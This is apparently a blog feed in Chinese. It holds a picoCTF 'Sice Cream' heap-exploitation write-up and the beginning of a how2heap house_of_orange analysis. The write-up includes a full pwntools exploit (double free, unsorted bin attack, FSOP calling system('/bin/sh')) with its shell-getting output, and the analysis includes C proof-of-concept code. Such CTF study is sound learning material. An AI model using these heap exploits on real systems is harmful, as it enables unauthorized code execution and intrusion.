🌈 JunHoo https://clot.github.io 🌈 junh00 clotjin@gmail.com clot.github.io PWN - Sice Cream <p><a href="https://play.picoctf.org/practice/challenge/55?category=6&amp;page=1">sice_cream 题目链接</a></p> <p>刚开始做到一半就没啥思路了,在看到并理解了<a href="../how2heap_house_of_orange">how2heap - house_of_orange</a>之后就回过头来把这题做了。主要用到的技术:DoubleFree + unsorted bin attack + FSOP。</p> <p>大致介绍下程序,选项1是malloc你指定的大小,可以malloc多个,选项2可以选择性的free你之前malloc的内存。有一个全局变量USER_NAME,选项3重命名并输出它。</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>clot@ubuntu:~/CTF/sice_cream<span class="nv">$ </span>./sice_cream Welcome to the Sice Cream Store! We have the best sice cream <span class="k">in </span>the world! Whats your name? <span class="o">&gt;</span> a 1. Buy sice cream 2. Eat sice cream 3. Reintroduce yourself 4. Exit <span class="o">&gt;</span> </code></pre></div></div> <h3 id="思路">思路</h3> <ol> <li>通过double free来将name的地址插入fast bin</li> <li>更改name的大小,再释放,使其放回unsorted bin</li> <li>改写name的bk指针,通过unsorted bin attack更改name-&gt;bk-&gt;fd指向unsorted bin,leak libc地址</li> <li>改写name来伪造FILE结构体,最后malloc触发崩溃并触发IO缓冲刷新,实际调用system函数。</li> </ol> <h3 id="double-free">double free</h3> <p>通过在一开始输入名字时,将大小0x21写在name+8的位置,这步是为了绕过之后fast bin对size的检查。</p> <p>之后就是double free的标准流程,最后一次buy操作返回的chunk实际是name的地址</p> <div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># name - fake chunk size: 0x21, bypass fastbin check </span><span class="n">p</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">'&gt;'</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x21</span><span class="p">)</span> <span class="o">*</span> <span class="mi">26</span><span class="p">)</span> <span class="c1"># double free </span><span class="n">buy</span><span class="p">(</span><span class="mi">20</span><span class="p">,</span> <span class="s">'A'</span><span class="o">*</span><span class="mi">8</span><span class="p">)</span> <span class="c1"># 0 </span><span class="n">buy</span><span class="p">(</span><span class="mi">20</span><span class="p">,</span> <span class="s">'B'</span><span class="o">*</span><span class="mi">8</span><span class="p">)</span> <span class="c1"># 1 </span><span class="n">eat</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="n">eat</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="n">eat</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1"># set fd pointer -&gt; &amp;USER_NAME </span><span class="n">buy</span><span class="p">(</span><span class="mi">20</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="n">nameAddr</span><span class="p">))</span> <span class="c1"># 2 </span><span class="n">buy</span><span class="p">(</span><span class="mi">20</span><span class="p">,</span> <span class="s">'C'</span><span class="o">*</span><span class="mi">8</span><span class="p">)</span> <span class="c1"># 3 </span><span class="n">buy</span><span class="p">(</span><span class="mi">20</span><span class="p">,</span> <span class="s">'D'</span><span class="o">*</span><span class="mi">8</span><span class="p">)</span> <span class="c1"># 4 </span> <span class="c1"># ret fake chunk from fast bin </span><span class="n">buy</span><span class="p">(</span><span class="mi">20</span><span class="p">,</span> <span class="s">'E'</span><span class="o">*</span><span class="mi">8</span><span class="p">)</span> <span class="c1"># 5 </span></code></pre></div></div> <h3 id="插入unsorted-bin">插入unsorted bin</h3> <p>这一步通过reintroduce的功能,改写name chunk的size字段,大于<code class="language-plaintext highlighter-rouge">MAX_FAST_SIZE</code>即可,在64位上最大是0x88,所以这里设置为<code class="language-plaintext highlighter-rouge">0x90 | previnuse 1</code>。然后通过eat来将其放到unsorted bin中,此时name + 0x10指向的是unsorted bin也就是libc中的地址。</p> <div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">reintroduce</span><span class="p">(</span><span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x91</span><span class="p">))</span> <span class="n">eat</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span> </code></pre></div></div> <h3 id="leak-libc">leak libc</h3> <p>通过reintroduce来改写字符串并leak libc的地址,再通过<code class="language-plaintext highlighter-rouge">system</code>和<code class="language-plaintext highlighter-rouge">_IO_list_all</code>函数的偏移来计算出它们各自的实际地址。</p> <div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># leak libc: unsorted bin address </span><span class="n">reintroduce</span><span class="p">(</span><span class="s">'A'</span><span class="o">*</span><span class="mi">15</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">()</span> <span class="n">addrStr</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">()[:</span><span class="o">-</span><span class="mi">2</span><span class="p">]</span> <span class="n">leakAddr</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">addrStr</span><span class="p">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">))</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"leakAddr: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">leakAddr</span><span class="p">)))</span> <span class="c1"># system address </span><span class="n">systemAddr</span> <span class="o">=</span> <span class="n">leakAddr</span> <span class="o">-</span> <span class="n">unsortedBinOffset</span> <span class="o">+</span> <span class="n">systemOffset</span> <span class="c1"># _IO_list_all </span><span class="n">IOListAllAddr</span> <span class="o">=</span> <span class="n">leakAddr</span> <span class="o">+</span> <span class="mh">0x9a8</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"IO_list_all: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">IOListAllAddr</span><span class="p">)))</span> </code></pre></div></div> <h3 id="unsorted-bin-attack--fsop">unsorted bin attack + FSOP</h3> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="n">unsorted_chunks</span> <span class="p">(</span><span class="n">av</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">bk</span> <span class="o">=</span> <span class="n">bck</span><span class="p">;</span> <span class="n">bck</span><span class="o">-&gt;</span><span class="n">fd</span> <span class="o">=</span> <span class="n">unsorted_chunks</span> <span class="p">(</span><span class="n">av</span><span class="p">);</span> </code></pre></div></div> <p>如果要使指针A的值指向unsorted bin,则需要将其-0x10后放置到chunk-&gt;bk的位置,这样fake chunk的fd也就是A就会指向unsorted bin。</p> <p>同时需要在name这块内存中伪造一个FILE结构体。上一篇<a href="../how2heap_house_of_orange">house_of_orange的分析</a>中对FSOP已经有较详细的介绍,这里大概说明下:在程序退出时会触发一个刷新IO的机制,此时会遍历<code class="language-plaintext highlighter-rouge">IO_list_all</code>的chain指针,假设当前遍历到了<code class="language-plaintext highlighter-rouge">_IO_FILE_plus A</code>,则会调用A的vtable中的<code class="language-plaintext highlighter-rouge">_IO_overflow(fp, EOF)</code>函数刷新IO,我们的目的也就是替换掉<code class="language-plaintext highlighter-rouge">_IO_overflow</code>这个函数以及它的fp参数。同时要绕过在执行该函数前对<code class="language-plaintext highlighter-rouge">(fp-&gt;_mode &lt;= 0 &amp;&amp; fp-&gt;_IO_write_ptr &gt; fp-&gt;_IO_write_base)</code>的检查。</p> <p>通过计算结构体中vtable以及_mode等字段的偏移,来设置我们的payload。但此时该结构体还未插入<code class="language-plaintext highlighter-rouge">_IO_list_all</code>的chain(fp + 0x68)字段中,由于此时<code class="language-plaintext highlighter-rouge">_IO_list_all</code>指向的是unsorted bin,所以我们需要将伪造的结构体插入到unosorted bin + 0x68即smallbin<a href="90 ~ 98">4</a>的位置。</p> <p>所以我们通过改写fake chunk的大小为0x61,使下次malloc时,将unsorted bin中的chunk放到对应的bin中,也就是smallbin[4]的位置。</p> <div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># unsorted bin attack + FSOP </span><span class="n">payload</span> <span class="o">=</span> <span class="n">sh</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x61</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">leakAddr</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">IOListAllAddr</span> <span class="o">-</span> <span class="mh">0x10</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">3</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">systemAddr</span><span class="p">)</span> <span class="o">*</span> <span class="mh">0x12</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">*</span> <span class="mi">3</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">nameAddr</span> <span class="o">+</span> <span class="mh">0x30</span><span class="p">)</span> <span class="n">reintroduce</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> </code></pre></div></div> <h3 id="获得shell">获得shell</h3> <p>最后只需再触发一次malloc,在malloc检查的过程中会发现<code class="language-plaintext highlighter-rouge">IO_list_all</code>指向的堆块已损坏便crash了。此时刷新IO,即调用<code class="language-plaintext highlighter-rouge">system("/bin/sh")</code></p> <div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># trigger malloc then get the shell after crash </span><span class="n">p</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">'&gt;'</span><span class="p">,</span><span class="s">'1'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">'&gt;'</span><span class="p">,</span> <span class="s">'50'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> </code></pre></div></div> <h3 id="完整的exploit">完整的exploit</h3> <div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">"libc.so.6"</span><span class="p">)</span> <span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">"sice_cream"</span><span class="p">)</span> <span class="n">REMOTE</span> <span class="o">=</span> <span class="mi">1</span> <span class="k">if</span> <span class="n">REMOTE</span><span class="p">:</span> <span class="n">host</span> <span class="o">=</span> <span class="s">'jupiter.challenges.picoctf.org'</span> <span class="n">port</span> <span class="o">=</span> <span class="s">'51890'</span> <span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span> <span class="k">else</span><span class="p">:</span> <span class="n">p</span> <span class="o">=</span> <span class="n">elf</span><span class="p">.</span><span class="n">process</span><span class="p">()</span> <span class="n">gdb</span><span class="p">.</span><span class="n">attach</span><span class="p">(</span><span class="n">p</span><span class="p">)</span> <span class="n">unsortedBinOffset</span> <span class="o">=</span> <span class="mh">0x3c4b87</span> <span class="c1"># __malloc_hook + 0x10(main_arena) + 88 </span><span class="n">IOListAllOffset</span> <span class="o">=</span> <span class="mh">0x3c5520</span> <span class="n">systemOffset</span> <span class="o">=</span> <span class="mh">0x45390</span> <span class="n">nameAddr</span> <span class="o">=</span> <span class="mh">0x602040</span> <span class="n">sh</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"/bin/sh;"</span> <span class="c1"># menu </span><span class="k">def</span> <span class="nf">buy</span><span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">content</span><span class="p">):</span> <span class="n">p</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">'&gt;'</span><span class="p">,</span> <span class="s">'1'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">'&gt;'</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">size</span><span class="p">))</span> <span class="n">p</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">'&gt;'</span><span class="p">,</span> <span class="n">content</span><span class="p">)</span> <span class="k">def</span> <span class="nf">eat</span><span class="p">(</span><span class="n">index</span><span class="p">):</span> <span class="n">p</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">'&gt;'</span><span class="p">,</span> <span class="s">'2'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">'&gt;'</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">index</span><span class="p">))</span> <span class="k">def</span> <span class="nf">reintroduce</span><span class="p">(</span><span class="n">name</span><span class="p">):</span> <span class="n">p</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">'&gt;'</span><span class="p">,</span> <span class="s">'3'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">'&gt;'</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span> <span class="c1"># name - fake chunk size: 0x21, bypass fastbin check </span><span class="n">p</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">'&gt;'</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x21</span><span class="p">)</span> <span class="o">*</span> <span class="mi">26</span><span class="p">)</span> <span class="c1"># double free </span><span class="n">buy</span><span class="p">(</span><span class="mi">20</span><span class="p">,</span> <span class="s">'A'</span><span class="o">*</span><span class="mi">8</span><span class="p">)</span> <span class="c1"># 0 </span><span class="n">buy</span><span class="p">(</span><span class="mi">20</span><span class="p">,</span> <span class="s">'B'</span><span class="o">*</span><span class="mi">8</span><span class="p">)</span> <span class="c1"># 1 </span><span class="n">eat</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="n">eat</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="n">eat</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1"># set fd pointer -&gt; &amp;USER_NAME </span><span class="n">buy</span><span class="p">(</span><span class="mi">20</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="n">nameAddr</span><span class="p">))</span> <span class="c1"># 2 </span><span class="n">buy</span><span class="p">(</span><span class="mi">20</span><span class="p">,</span> <span class="s">'C'</span><span class="o">*</span><span class="mi">8</span><span class="p">)</span> <span class="c1"># 3 </span><span class="n">buy</span><span class="p">(</span><span class="mi">20</span><span class="p">,</span> <span class="s">'D'</span><span class="o">*</span><span class="mi">8</span><span class="p">)</span> <span class="c1"># 4 </span> <span class="c1"># ret fake chunk from fast bin </span><span class="n">buy</span><span class="p">(</span><span class="mi">20</span><span class="p">,</span> <span class="s">'E'</span><span class="o">*</span><span class="mi">8</span><span class="p">)</span> <span class="c1"># 5 </span> <span class="c1"># the size must be greater than 0x88 to insert to unsorted bin after eat. </span><span class="n">reintroduce</span><span class="p">(</span><span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x91</span><span class="p">))</span> <span class="n">eat</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span> <span class="c1"># leak libc: unsorted bin address </span><span class="n">reintroduce</span><span class="p">(</span><span class="s">'A'</span><span class="o">*</span><span class="mi">15</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">()</span> <span class="n">addrStr</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">()[:</span><span class="o">-</span><span class="mi">2</span><span class="p">]</span> <span class="n">leakAddr</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">addrStr</span><span class="p">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">))</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"leakAddr: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">leakAddr</span><span class="p">)))</span> <span class="c1"># system address </span><span class="n">systemAddr</span> <span class="o">=</span> <span class="n">leakAddr</span> <span class="o">-</span> <span class="n">unsortedBinOffset</span> <span class="o">+</span> <span class="n">systemOffset</span> <span class="c1"># _IO_list_all </span><span class="n">IOListAllAddr</span> <span class="o">=</span> <span class="n">leakAddr</span> <span class="o">+</span> <span class="mh">0x9a8</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"IO_list_all: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">IOListAllAddr</span><span class="p">)))</span> <span class="c1"># unsorted bin attack + FSOP </span><span class="n">payload</span> <span class="o">=</span> <span class="n">sh</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x61</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">leakAddr</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">IOListAllAddr</span> <span class="o">-</span> <span class="mh">0x10</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">3</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">systemAddr</span><span class="p">)</span> <span class="o">*</span> <span class="mh">0x12</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">*</span> <span class="mi">3</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">nameAddr</span> <span class="o">+</span> <span class="mh">0x30</span><span class="p">)</span> <span class="n">reintroduce</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="c1"># trigger malloc then get the shell after crash </span><span class="n">p</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">'&gt;'</span><span class="p">,</span><span class="s">'1'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">'&gt;'</span><span class="p">,</span> <span class="s">'50'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> </code></pre></div></div> <h3 id="执行结果">执行结果</h3> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>clot@ubuntu:~/CTF/sice_cream<span class="nv">$ </span>python3 sice_cream.py <span class="o">[</span><span class="k">*</span><span class="o">]</span> <span class="s1">'/home/clot/CTF/sice_cream/libc.so.6'</span> Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled <span class="o">[</span><span class="k">*</span><span class="o">]</span> <span class="s1">'/home/clot/CTF/sice_cream/sice_cream'</span> Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: No PIE <span class="o">(</span>0x400000<span class="o">)</span> RUNPATH: b<span class="s1">'./'</span> <span class="o">[</span>+] Opening connection to jupiter.challenges.picoctf.org on port 51860: Done <span class="o">[</span><span class="k">*</span><span class="o">]</span> leakAddr: 0x7fd4ff71fb78 <span class="o">[</span><span class="k">*</span><span class="o">]</span> IO_list_all: 0x7fd4ff720520 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Switching to interactive mode <span class="k">***</span> Error <span class="k">in</span> <span class="sb">`</span>/problems/sice-cream_2_fba6d241362269d610df62c069a9828f/sice_cream<span class="s1">': malloc(): memory corruption: 0x00007fd4ff720520 *** ======= Backtrace: ========= ./libc.so.6(+0x777e5)[0x7fd4ff3d27e5] ./libc.so.6(+0x8213e)[0x7fd4ff3dd13e] ./libc.so.6(__libc_malloc+0x54)[0x7fd4ff3df184] /problems/sice-cream_2_fba6d241362269d610df62c069a9828f/sice_cream[0x4009d8] /problems/sice-cream_2_fba6d241362269d610df62c069a9828f/sice_cream[0x400c8f] ./libc.so.6(__libc_start_main+0xf0)[0x7fd4ff37b830] /problems/sice-cream_2_fba6d241362269d610df62c069a9828f/sice_cream[0x4007ea] ======= Memory map: ======== 00400000-00402000 r-xp 00000000 103:01 2560377 /problems/sice-cream_2_fba6d241362269d610df62c069a9828f/sice_cream 00601000-00602000 r--p 00001000 103:01 2560377 /problems/sice-cream_2_fba6d241362269d610df62c069a9828f/sice_cream 00602000-00603000 rw-p 00002000 103:01 2560377 /problems/sice-cream_2_fba6d241362269d610df62c069a9828f/sice_cream 018cb000-018ec000 rw-p 00000000 00:00 0 [heap] 7fd4f8000000-7fd4f8021000 rw-p 00000000 00:00 0 7fd4f8021000-7fd4fc000000 ---p 00000000 00:00 0 7fd4ff143000-7fd4ff15a000 r-xp 00000000 103:01 2054 /lib/x86_64-linux-gnu/libgcc_s.so.1 7fd4ff15a000-7fd4ff359000 ---p 00017000 103:01 2054 /lib/x86_64-linux-gnu/libgcc_s.so.1 7fd4ff359000-7fd4ff35a000 r--p 00016000 103:01 2054 /lib/x86_64-linux-gnu/libgcc_s.so.1 7fd4ff35a000-7fd4ff35b000 rw-p 00017000 103:01 2054 /lib/x86_64-linux-gnu/libgcc_s.so.1 7fd4ff35b000-7fd4ff51b000 r-xp 00000000 103:01 2560378 /problems/sice-cream_2_fba6d241362269d610df62c069a9828f/libc.so.6 7fd4ff51b000-7fd4ff71b000 ---p 001c0000 103:01 2560378 /problems/sice-cream_2_fba6d241362269d610df62c069a9828f/libc.so.6 7fd4ff71b000-7fd4ff71f000 r--p 001c0000 103:01 2560378 /problems/sice-cream_2_fba6d241362269d610df62c069a9828f/libc.so.6 7fd4ff71f000-7fd4ff721000 rw-p 001c4000 103:01 2560378 /problems/sice-cream_2_fba6d241362269d610df62c069a9828f/libc.so.6 7fd4ff721000-7fd4ff725000 rw-p 00000000 00:00 0 7fd4ff725000-7fd4ff74b000 r-xp 00000000 103:01 2560379 /problems/sice-cream_2_fba6d241362269d610df62c069a9828f/ld-2.23.so 7fd4ff946000-7fd4ff94a000 rw-p 00000000 00:00 0 7fd4ff94a000-7fd4ff94b000 r--p 00025000 103:01 2560379 /problems/sice-cream_2_fba6d241362269d610df62c069a9828f/ld-2.23.so 7fd4ff94b000-7fd4ff94c000 rw-p 00026000 103:01 2560379 /problems/sice-cream_2_fba6d241362269d610df62c069a9828f/ld-2.23.so 7fd4ff94c000-7fd4ff94d000 rw-p 00000000 00:00 0 7ffef58fd000-7ffef591e000 rw-p 00000000 00:00 0 [stack] 7ffef593d000-7ffef5940000 r--p 00000000 00:00 0 [vvar] 7ffef5940000-7ffef5941000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0 [vsyscall] $ ls flag.txt ld-2.23.so libc.so.6 sice_cream xinet_startup.sh </span></code></pre></div></div> Tue, 05 Jan 2021 00:00:00 +0000 https://clot.github.io//picoCTF-Sice_Cream https://clot.github.io/picoCTF-Sice_Cream Heap Exploitation - how2heap - house_of_orange <h2 id="house_of_orange">house_of_orange</h2> <h3 id="unsorted-bin-attack--fsop">unsorted bin attack + FSOP</h3> <p>先是利用unsorted bin attack来实现任意地址改写,再通过伪造<code class="language-plaintext highlighter-rouge">__IO_list_all</code>结构体来完成任意代码执行,具体分析见下。(下面源码中删除了大段的注释和log。)</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">winner</span> <span class="p">(</span> <span class="kt">char</span> <span class="o">*</span><span class="n">ptr</span><span class="p">);</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="kt">char</span> <span class="o">*</span><span class="n">p1</span><span class="p">,</span> <span class="o">*</span><span class="n">p2</span><span class="p">;</span> <span class="kt">size_t</span> <span class="n">io_list_all</span><span class="p">,</span> <span class="o">*</span><span class="n">top</span><span class="p">;</span> <span class="c1">// 1</span> <span class="n">p1</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x400</span><span class="o">-</span><span class="mi">16</span><span class="p">);</span> <span class="n">top</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="p">)</span> <span class="p">(</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span> <span class="n">p1</span> <span class="o">+</span> <span class="mh">0x400</span> <span class="o">-</span> <span class="mi">16</span><span class="p">);</span> <span class="n">top</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0xc01</span><span class="p">;</span> <span class="n">p2</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x1000</span><span class="p">);</span> <span class="n">io_list_all</span> <span class="o">=</span> <span class="n">top</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">+</span> <span class="mh">0x9a8</span><span class="p">;</span> <span class="n">top</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="n">io_list_all</span> <span class="o">-</span> <span class="mh">0x10</span><span class="p">;</span> <span class="n">memcpy</span><span class="p">(</span> <span class="p">(</span> <span class="kt">char</span> <span class="o">*</span><span class="p">)</span> <span class="n">top</span><span class="p">,</span> <span class="s">"/bin/sh</span><span class="se">\x00</span><span class="s">"</span><span class="p">,</span> <span class="mi">8</span><span class="p">);</span> <span class="n">top</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x61</span><span class="p">;</span> <span class="cm">/* Now comes the part where we satisfy the constraints on the fake file pointer required by the function _IO_flush_all_lockp and tested here: https://code.woboq.org/userspace/glibc/libio/genops.c.html#813 We want to satisfy the first condition: fp-&gt;_mode &lt;= 0 &amp;&amp; fp-&gt;_IO_write_ptr &gt; fp-&gt;_IO_write_base */</span> <span class="kt">FILE</span> <span class="o">*</span><span class="n">fp</span> <span class="o">=</span> <span class="p">(</span><span class="kt">FILE</span> <span class="o">*</span><span class="p">)</span> <span class="n">top</span><span class="p">;</span> <span class="cm">/* 1. Set mode to 0: fp-&gt;_mode &lt;= 0 */</span> <span class="n">fp</span><span class="o">-&gt;</span><span class="n">_mode</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">// top+0xc0</span> <span class="cm">/* 2. Set write_base to 2 and write_ptr to 3: fp-&gt;_IO_write_ptr &gt; fp-&gt;_IO_write_base */</span> <span class="n">fp</span><span class="o">-&gt;</span><span class="n">_IO_write_base</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span> <span class="mi">2</span><span class="p">;</span> <span class="c1">// top+0x20</span> <span class="n">fp</span><span class="o">-&gt;</span><span class="n">_IO_write_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span> <span class="mi">3</span><span class="p">;</span> <span class="c1">// top+0x28</span> <span class="cm">/* 4) Finally set the jump table to controlled memory and place system there. The jump table pointer is right after the FILE struct: base_address+sizeof(FILE) = jump_table 4-a) _IO_OVERFLOW calls the ptr at offset 3: jump_table+0x18 == winner */</span> <span class="kt">size_t</span> <span class="o">*</span><span class="n">jump_table</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">top</span><span class="p">[</span><span class="mi">12</span><span class="p">];</span> <span class="c1">// controlled memory</span> <span class="n">jump_table</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span> <span class="o">&amp;</span><span class="n">winner</span><span class="p">;</span> <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="p">)</span> <span class="p">((</span><span class="kt">size_t</span><span class="p">)</span> <span class="n">fp</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">FILE</span><span class="p">))</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span> <span class="n">jump_table</span><span class="p">;</span> <span class="c1">// top+0xd8</span> <span class="cm">/* Finally, trigger the whole chain by calling malloc */</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> <span class="cm">/* The libc's error message will be printed to the screen But you'll get a shell anyways. */</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="kt">int</span> <span class="nf">winner</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">ptr</span><span class="p">)</span> <span class="p">{</span> <span class="n">system</span><span class="p">(</span><span class="n">ptr</span><span class="p">);</span> <span class="n">syscall</span><span class="p">(</span><span class="n">SYS_exit</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div></div> <p>整个代码中并没有free的操作,而是通过扩展top chunk时对old top chunk执行_int_free来创建free chunk。</p> 